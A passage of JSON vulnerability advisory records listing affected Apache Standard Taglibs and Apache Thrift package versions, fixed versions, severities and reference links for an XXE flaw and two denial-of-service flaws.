"http://packetstormsecurity.com/files/130575/Apache-Standard-Taglibs-1.2.1-XXE-Remote-Command-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1695.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1838.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1839.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1840.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1841.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534772/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72809" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1034934" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2551-1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T18:42:48Z", "nvd_published_at": "2015-03-09T14:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-6x4w-8w53-xrvv", "published": "2020-09-14T18:44:01Z", "modified": "2024-12-02T06:03:30.310261Z", "aliases": [ "CVE-2015-0254" ], "summary": "XXE in Apache Standard Taglibs", "details": "Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) \u003cx:parse\u003e or (2) \u003cx:transform\u003e JSTL XML tag.", "affected": [ { "package": { "name": "org.apache.taglibs:taglibs-standard", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } }, { "package": { "name": "org.apache.taglibs:taglibs-standard-impl", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard-impl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0254" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1376" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a20e48acb2a40be5130df91cf9d39d8ad93181989413d4abcaa4914@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c93d8ade3788dbc00f5a37238bc278e7d859f2446b885460783a16f@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1686f6196bb9063bf26577a21b8033c19c1a30e5a9159869c8f3d38@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1179e6971bc46f0f68879a9a10cc97ad4424451b0889aeef04c8077@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc2bfd99c340dafd501676693cd889c1f9f838b97bdd0776a8f5557d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": 
"http://lists.opensuse.org/opensuse-updates/2015-10/msg00033.html" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/tomcat-taglibs-user/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A%40apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/130575/Apache-Standard-Taglibs-1.2.1-XXE-Remote-Command-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1695.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1838.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1839.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1840.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1841.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534772/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72809" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1034934" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2551-1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T18:42:48Z", "nvd_published_at": "2015-03-09T14:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-g2fg-mr77-6vrm", "published": "2021-03-12T21:33:55Z", "modified": "2024-03-15T05:31:48.921973Z", "aliases": [ "CVE-2020-13949" ], "related": [ "CGA-3pv7-5j5f-w8rx", "CGA-7fjw-8fvm-77hc" ], "summary": "Uncontrolled Resource Consumption in Apache Thrift", "details": "In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "0.9.3" }, { "fixed": "0.14.0" } ] } ], "versions": [ "0.10.0", "0.11.0", "0.12.0", "0.13.0", "0.9.3", "0.9.3-1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-g2fg-mr77-6vrm/GHSA-g2fg-mr77-6vrm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949" }, { "type": "WEB", "url": "https://github.com/apache/hbase/pull/2958" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3574bc1036b577b265be510e6b208f0a5d5d84cd7198347dc8482df@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raea1bb8cf2eb39c5e10543f547bdbbdbb563c2ac6377652f161d4e37@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae95c2234b6644bfd666b2671a1b42a09f38514d0f27cca3c7d5d55a@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rada9d2244a66ede0be29afc5d5f178a209f9988db56b9b845d955741@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad635e16b300cf434280001ee6ecd2ed2c70987bf16eb862bfa86e02@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/race178e9500ab8a5a6112667d27c48559150cadb60f2814bc67c40af@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9f7c755790313e1adb95d29794043fb102029e803daf4212ae18063@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7371efd8363c1cd0f5331aafd359a808cf7277472b8616d7b392128@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3f7f06a1759c8e2985ed24ae2f5483393c744c1956d661adc873f2c@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9ec75f690dd60fec8621ba992290962705d5b7f0d8fd0a42fab0ac9f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b51e7c253cb0989b4c03ed9f4e5f0478e427473357209ccc4d08ebf@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r995b945cc8f6ec976d8c52d42ba931a688b45fb32cbdde715b6a816a@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r950ced188d62320fdb84d9e2c6ba896328194952eff7430c4f55e4b0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93f23f74315e009f4fb68ef7fc794dceee42cf87fe6613814dcd8c70@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90b4473950e26607ed77f3d70f120166f6a36a3f80888e4eeabcaf91@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dfbefcd606af6737b62461a45a9af9222040b62eab474ff2287cf75@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r89fdd39965efb7c6d22bc21c286d203252cea476e1782724aca0748e@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r890b8ec5203d70a59a6b1289420d46938d9029ed706aa724978789be@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8897a41f50d4eb19b268bde99328e943ba586f77779efa6de720c39f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r886b6d9a89b6fa0aafbf0a8f8f14351548d6c6f027886a3646dbd075@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r869331422580d35b4e65bd74cf3090298c4651bf4f31bfb19ae769da@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850522c56c05aa06391546bdb530bb8fc3437f2b77d16e571ae73309@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r812915ecfa541ad2ca65c68a97b2c014dc87141dfaefc4de85049681@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ae909438ff5a2ffed9211e6ab0bd926396fd0b1fc33f31a406ee704@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7597683cc8b87a31ec864835225a543dad112d7841bf1f17bf7eb8db@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74eb88b422421c65514c23cb9c2b2216efb9254317ea1b6a264fe6dc@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r741364444c3b238ab4a161f67f0d3a8f68acc517a39e6a93aa85d753@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202107-32" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbb01bb85cdc2022f3b96bdc416dbfcb49a2855b3a340aa88b2e1de9@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf75979ae0ffd526f3afa935a8f0ee13c82808ea8b2bc0325eb9dcd90@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf741d08c7e0ab1542c81ea718467422bd01159ed284796a36ad88311@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf65df763f630163a3f620887efec082080555cee1adb0b8eaf2c7ddb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf603d25213cfff81d6727c259328846b366fd32a43107637527c9768@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf568168e7f83871969928c0379813da6d034485f8b20fa73884816d6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdcf00186c34d69826d9c6b1f010136c98b00a586136de0061f7d267e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc8e0f92d06decaee5db58de4ded16d80016a7db2240a8db17225c49@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd78cdd87d84499a404202f015f55935db3658bd0983ecec81e6b18c6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd49d53b146d94a7d3a135f6b505589655ffec24ea470e345d31351bb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd370fdb419652c5219409b315a6349b07a7e479bd3f151e9a5671774@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0734d91f16d5b050f0bcff78b4719300042a34fadf5e52d0edf898e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdf62ecd36e39e4ff9c61802eee4927ce9ecff1602eed1493977ef4c@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcae4c66f67e701db44d742156dee1f3e5e4e07ad7ce10c740a76b669@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcace846f74ea9e2af2f7c30cef0796724aa74089f109c8029b850163@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc896ce7761999b088f3adabcb99dde2102b6a66130b8eec6c8265eab@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7a79b08822337c68705f16ee7ddcfd352313b836e78a4b86c7a7e3d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7a241e0af086b226ff9ccabc4a243d206f0f887037994bfd8fcaaeb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc48ab5455bdece9a4afab53ca0f1e4f742d5baacb241323454a87b4e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbfbb81e7fb5d5009caf25798f02f42a7bd064a316097303ba2f9ed76@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5cad06a46d23253a3c819229efedecfc05f89ef53f5fdde77a86d6@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb91c32194eb5006f0b0c8bcdbd512c13495a1b277d4d51d45687f036@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51977d392b01434b0b5df5c19b9ad5b6178cfea59e676c14f24c053@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb44ec04e5a9b1f87fef97bb5f054010cbfaa3b8586472a3a38a16fca@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72c3d1582d50b2ca7dd1ee97e81c847a5cf3458be26d42653c39d7a6@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r298a25228868ebc0943d56c8f3641212a0962d2dbcf1507d5860038e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r286e9a13d3ab0550042997219101cb87871834b8d5ec293b0c60f009@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27b7d3d95ffa8498899ef1c9de553d469f8fe857640a3f6e58dba640@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r278e96edc4bc13efb2cb1620a73e48f569162b833c6bda3e6ea18b80@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20f6f8f8cf07986dc5304baed3bf4d8a1c4cf135ff6fe3640be4d7ec@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fb2d26b81c64ce96c4fd42b9e6842ff315b02c36518213b6c057350@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dea91f0562e0a960b45b1c5635b2a47b258b77171334276bcf260a7@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r196409cc4df929d540a2e66169104f2b3b258d8bd96b5f083c59ee51@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r191a9279e2863b68e5496ee4ecd8be0d4fe43b324b934f0d1f106e1d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18732bb1343894143d68db58fe4c8f56d9cd221b37f1378ed7373372@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17cca685ad53bc8300ee7fcfe874cb784a222343f217dd076e7dc1b6@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179119bbfb5610499286a84c316f6789c5afbfa5340edec6eb28d027@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15eed5d21e16a5cce810c1e096ffcffc36cd08c2f78ce2f9b24b4a6a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1504886a550426d3c05772c47b1a6350c3235e51fd1fdffbec43e974@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1456eab5f3768be69436d5b0a68b483eb316eb85eb3ef6eba156a302@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143ca388b0c83fe659db14be76889d50b453b0ee06f423181f736933@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r13f40151513ff095a44a86556c65597a7e55c00f5e19764a05530266@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r12090c81b67d21a814de6cf54428934a5e5613fde222759bbb05e99b@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r117d5d2b08d505b69558a2a31b0a1cf8990cd0385060b147e70e76a9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r1084a911dff90b2733b442ee0f5929d19b168035d447f2d25f534fe4@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08a7bd19470ef8950d58cc9d9e7b02bc69c43f56c601989a7729cce5@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0372f0af2dad0b76fbd7a6cfdaad29d50384ad48dda475a5026ff9a3@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02f7771863383ae993eb83cdfb70c3cb65a355c913242c850f61f1b8@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02ba8db500d15a5949e9a7742815438002ba1cf1b361bdda52ed40ca@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01b34416677f1ba869525e1b891ac66fa6f88c024ee4d7cdea6b456b@%3Cissues.hbase.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/hbase" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c5b7324274fd361b038c5cc316e99344b7ae20beae7163214fac14d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ba4f0817f98bf7c1cb314301cb7a24ba11a0b3e7a5be8b0ae3190b0@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ae3c68b0bfe430fb32f24236475276b6302bed625b23f53b68748b5@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r699c031e6921b0ad0f943848e7ba1d0e88c953619d47908618998f76@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6990c849aeafe65366794bfd002febd47b7ffa8cf3c059b400bbb11d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r668aed02e287c93403e0b8df16089011ee4a96afc8f479809f1fc07f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r635133a74fa07ef3331cae49a9a088365922266edd58099a6162a5d3@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r62aa6d07b23095d980f348d330ed766560f9a9e940fec051f534ce37@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r587b4a5bcbc290269df0906bafba074f3fe4e50d4e959212f56fa7ea@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r533a172534ae67f6f17c4d33a1b814d3d5ada9ccd4eb442249f33fa2@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r515e01a30443cfa2dbb355c44c63149869afd684fb7b0344c58fa67b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4fa53eacca2ac38904f38dc226caebb3f2f668b2da887f2fd416f4a7@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d90b6d8de9697beb38814596d3a0d4994fa9aba1f6731a2c648d3ae@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r449288f6a941a2585262e0f4454fdefe169d5faee33314f6f89fab30@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43dc2b2e928e9d845b07ac075634cb759d91bb852421dc282f87a74a%40%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r421a9a76811c1aed7637b5fe5376ab14c09ccdd7b70d5211d6e76d1e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r409e296c890753296c544a74d4de0d4a3ce719207a5878262fa2bd71@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f97dbbbb1b2a7324521208bb595392853714e141a37b8f68d395835@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f3e1d562c528b4bafef2dde51f79dd444a4b68ef24920d68068b6f9@%3Cissues.hbase.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r3e31ec7e8c39db7553be4f4fd4d27cf27c41f1ba9c985995c4ea9c5a@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3de0e0c26d4bd00dd28cab27fb44fba11d1c1d20275f7cce71393dd1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a1291a7ab8ee43db87cb0253371489810877028fc6e7c68dc640926@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3550b61639688e0efbc253c6c3e6358851c1f053109f1c149330b535@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f6a547f226579f542eb08793631d1f2d47d7aed7e2f9d11a4e6af9f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ed66a3823990306b742b281af1834b9bc85f98259c870b8ffb13d93@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d180180f37c2ab5cebd711d080d01d8452efa8ad43c5d9cd7064621@%3Cissues.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-12T19:44:27Z", "nvd_published_at": "2021-02-12T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rj7p-rfgp-852x", "published": "2022-05-24T17:00:01Z", "modified": "2024-03-10T05:16:21.459619Z", "aliases": [ "CVE-2019-0205" ], "related": [ "CGA-3p6j-9f2g-h7xg" ], "summary": "Loop with Unreachable Exit Condition in Apache Thrift", "details": "In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when feed with specific input data. 
Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.13.0" } ] } ], "versions": [ "0.10.0", "0.11.0", "0.12.0", "0.6.1", "0.7.0", "0.8.0", "0.9.0", "0.9.1", "0.9.2", "0.9.3", "0.9.3-1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.12.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rj7p-rfgp-852x/GHSA-rj7p-rfgp-852x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0205" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4633082b834eebccd0d322697651d931ab10ca9c51ee7ef18e1f60f4@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50bf84c60867574238d18cdad5da9f303b618114c35566a3a001ae08@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r53c03e1c979b9c628d0d65e0f49dd9a9f9d7572838727ad11b750575@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55609613abab203a1f2c1f3de050b63ae8f5c4a024df0d848d6915ff@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r569b2b3da41ff45bfacfca6787a4a8728edd556e185b69b140181d9d@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r573029c2f8632e3174b9eea7cd57f9c9df33f2f706450e23fc57750a@%3Ccommits.thrift.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r67a704213d13326771f46c84bbd84c8281bb93946e155e0e40abcb4c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r73a3c8b80765e3d2430ff51f22b778d0c917919f01815b69ed16cf9d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7859e767c90c8f4971dec50f801372aa64e88f143c3e8a265a36f9b4@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92b7771afee2625209c36727fefdc77033964e9a1daa81ec3327e625@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r934f312dd5add7276ac2de684d8b237554ff9f34479a812df5fd6aee@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab740e5c70424ef79fd095a4b076e752109aeee41c4256c2e5e5e142@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb139fa1d2714822d8c6e6f3bd6f5d5c91844d313201185c409288fd9@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba61c1f3a3b1960a6a694775b1a437751eba0825f30188f69387fe90@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce0d368a78b42c545f26c2e6e91e2b8a91b27b60d0cb45fe1911d337@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re387dc6ca11cb0b0ce4de8e800bb91ca50fee054b80105f5cd34adcb@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": 